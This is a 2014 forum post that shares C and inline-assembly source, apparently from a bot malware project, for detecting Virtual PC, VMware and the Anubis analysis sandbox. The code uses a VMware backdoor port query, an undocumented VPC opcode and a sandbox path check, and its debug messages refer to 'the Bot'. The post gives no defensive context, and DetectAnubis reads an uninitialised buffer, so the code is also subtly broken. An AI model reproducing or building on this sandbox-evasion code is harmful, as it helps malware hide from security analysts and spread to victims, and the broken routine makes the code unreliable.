io.kent Posted February 18, 2014 Report Posted February 18, 2014 #include "../Headers/includes.h"#include "../Headers/functions.h"#ifndef NO_ANTIVMDWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep){ PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION;}bool DetectVPC(){ bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent;}bool DetectVMWare(){ bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent;}bool DetectAnubis(){ char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:\\InsideTm\\")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent;}bool IsProcessRunningUnderVM(){ bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE;}#endif Quote
